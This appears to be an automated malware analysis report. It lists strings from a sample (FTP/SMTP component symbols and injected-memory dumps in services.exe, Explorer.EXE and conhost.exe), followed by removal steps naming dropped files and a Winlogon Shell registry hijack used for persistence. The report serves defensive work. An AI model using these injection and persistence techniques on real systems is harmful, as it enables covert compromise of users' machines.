@Ftpsrv@TFtpServer@TriggerBuildDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%o
@Ftpsrv@TFtpServer@TriggerChangeDirectory$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringro
@Ftpsrv@TFtpServer@TriggerClientCommand$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@TriggerClientConnect$qqrp22Ftpsrvc@TFtpCtrlSocketus
@Ftpsrv@TFtpServer@TriggerClientDisconnect$qqrp22Ftpsrvc@TFtpCtrlSocketus
@Ftpsrv@TFtpServer@TriggerMakeDirectory$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringro
@Ftpsrv@TFtpServer@TriggerRetrDataSent$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerRetrSessionClosed$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerRetrSessionConnected$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerSendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%
@Ftpsrv@TFtpServer@TriggerServerStart$qqrv
@Ftpsrv@TFtpServer@TriggerServerStop$qqrv
@Ftpsrv@TFtpServer@TriggerStorDataAvailable$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketpcius
@Ftpsrv@TFtpServer@TriggerStorSessionClosed$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerStorSessionConnected$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerValidateDele$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateGet$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidatePut$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateRnFr$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateRnTo$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@WMFtpSrvAbortTransfer$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvClientClosed$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvCloseData$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvCloseRequest$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WndProc$qqrr17Messages@TMessage
@Ftpsrv@initialization$qqrv
@Ftpsrvc@CopyRight
@Ftpsrvc@EFtpCtrlSocketException@
@Ftpsrvc@Finalization$qqrv
@Ftpsrvc@IsUNC$qqr17System@AnsiString
@Ftpsrvc@PatchIE5$qqrr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@
@Ftpsrvc@TFtpCtrlSocket@$bctr$qqrp18Classes@TComponent
@Ftpsrvc@TFtpCtrlSocket@$bdtr$qqrv
@Ftpsrvc@TFtpCtrlSocket@Dup$qqri
@Ftpsrvc@TFtpCtrlSocket@GetPeerAddr$qqrv
@Ftpsrvc@TFtpCtrlSocket@SendAnswer$qqr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@SetAbortingTransfer$qqro
@Ftpsrvc@TFtpCtrlSocket@SetDirectory$qqr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@SetRcvSize$qqri
@Ftpsrvc@TFtpCtrlSocket@StartConnection$qqrv
@Ftpsrvc@TFtpCtrlSocket@TriggerCommand$qqrpci
@Ftpsrvc@TFtpCtrlSocket@TriggerDataAvailable$qqrus
@Ftpsrvc@TFtpCtrlSocket@TriggerSessionConnected$qqrus
@Ftpsrvc@initialization$qqrv
@Ftpsrvt@CopyRight
@Ftpsrvt@FileUtcStr$qqr17System@AnsiString
@Ftpsrvt@Finalization$qqrv
@Ftpsrvt@initialization$qqrv
@Smtpprot@CopyRight
@Smtpprot@Finalization$qqrv
@Smtpprot@Register$qqrv
@Smtpprot@Rfc822DateTime$qqr16System@TDateTime
@Smtpprot@SmtpException@
@Smtpprot@TCustomSmtpClient@
@Smtpprot@TCustomSmtpClient@$bctr$qqrp18Classes@TComponent
@Smtpprot@TCustomSmtpClient@$bdtr$qqrv
@Smtpprot@TCustomSmtpClient@Abort$qqrv
@Smtpprot@TCustomSmtpClient@CheckReady$qqrv
@Smtpprot@TCustomSmtpClient@ClearErrorMessage$qqrv
@Smtpprot@TCustomSmtpClient@Connect$qqrv
@Smtpprot@TCustomSmtpClient@Data$qqrv
@Smtpprot@TCustomSmtpClient@DataNext$qqrv
@Smtpprot@TCustomSmtpClient@DisplayLastResponse$qqrv
@Smtpprot@TCustomSmtpClient@DoHighLevelAsync$qqrv
@Smtpprot@TCustomSmtpClient@DoUUEncode$qqrrpvr17System@AnsiStringro
@Smtpprot@TCustomSmtpClient@EndUUEncode$qqrrpv
@Smtpprot@TCustomSmtpClient@ExecAsync$qqr21Smtpprot@TSmtpRequest17System@AnsiStringpxusxiynpqqrv$v
@Smtpprot@TCustomSmtpClient@Helo$qqrv
@Smtpprot@TCustomSmtpClient@HighLevelAsync$qqr21Smtpprot@TSmtpRequest45System@%Set$t17Smtpprot@TSmtpFct$iuc$0$iuc$8%
@Smtpprot@TCustomSmtpClient@InitUUEncode$qqrrpv17System@AnsiString
@Smtpprot@TCustomSmtpClient@Mail$qqrv
@Smtpprot@TCustomSmtpClient@MailFrom$qqrv
@Smtpprot@TCustomSmtpClient@NextExecAsync$qqrv
@Smtpprot@TCustomSmtpClient@Open$qqrv
@Smtpprot@TCustomSmtpClient@Quit$qqrv
@Smtpprot@TCustomSmtpClient@RcptTo$qqrv
@Smtpprot@TCustomSmtpClient@RcptToDone$qqrv
@Smtpprot@TCustomSmtpClient@RcptToNext$qqrv
@Smtpprot@TCustomSmtpClient@Rset$qqrv
@Smtpprot@TCustomSmtpClient@SendCommand$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@SetContentType$qqr25Smtpprot@TSmtpContentType
@Smtpprot@TCustomSmtpClient@SetErrorMessage$qqrv
@Smtpprot@TCustomSmtpClient@SetMailMessage$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@SetRcptName$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@StateChange$qqr19Smtpprot@TSmtpState
@Smtpprot@TCustomSmtpClient@TriggerCommand$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerDisplay$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerGetData$qqripciro
@Smtpprot@TCustomSmtpClient@TriggerHeaderLine$qqrpci
@Smtpprot@TCustomSmtpClient@TriggerProcessHeader$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@TriggerRequestDone$qqrus
@Smtpprot@TCustomSmtpClient@TriggerResponse$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerSessionClosed$qqrus
@Smtpprot@TCustomSmtpClient@TriggerSessionConnected$qqrus
@Smtpprot@TCustomSmtpClient@TriggerStateChange$qqrv
@Smtpprot@TCustomSmtpClient@Vrfy$qqrv
@Smtpprot@TCustomSmtpClient@WMSmtpRequestDone$qqrr17Messages@TMessage

services.exe_1276_rwx_00401000_001F6000:


services.exe_1276_rwx_01401000_00005000:

CBv.SCv
RegEnumKeyW
Advapi32.dll
kernel32.dll
NTDLL.DLL
Windows services
{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
user32.dll
C:\Windows\services.exe
KERNEL32.dll
SetWindowsHookExA
UnhookWindowsHookEx
USER32.dll
GetCPInfo
TESTDLL.dll

Explorer.EXE_2024_rwx_10001000_00001000:

CBv.SCv
RegEnumKeyW
Advapi32.dll
kernel32.dll
NTDLL.DLL
Windows services
{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
user32.dll

Explorer.EXE_2024_rwx_10004000_00002000:

C:\Windows\Explorer.EXE
KERNEL32.dll
SetWindowsHookExA
UnhookWindowsHookEx
USER32.dll
GetCPInfo
TESTDLL.dll

conhost.exe_3700_rwx_10001000_00001000:

CBv.SCv
RegEnumKeyW
Advapi32.dll
kernel32.dll
NTDLL.DLL
Windows services
{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
user32.dll

conhost.exe_3700_rwx_10004000_00002000:

C:\Windows\system32\conhost.exe
KERNEL32.dll
SetWindowsHookExA
UnhookWindowsHookEx
USER32.dll
GetCPInfo
TESTDLL.dll


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    fservice.exe:1476
    5141.exe:288
    %original file name%.exe:3624

  2. Delete the original AIT file.
  3. Delete or disinfect the following files created/modified by the AIT:

    C:\Windows\services.exe (2457 bytes)
    C:\Windows\system\sservice.exe (2105 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5141\5141.exe.bat (135 bytes)
    C:\Windows\System32\fservice.exe (2457 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jbvpkqi (10089 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\autA852.tmp (5393 bytes)

  4. Remove the references to the AIT by modifying the following registry value(s) (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "Shell" = "Explorer.exe C:\Windows\system32\fservice.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
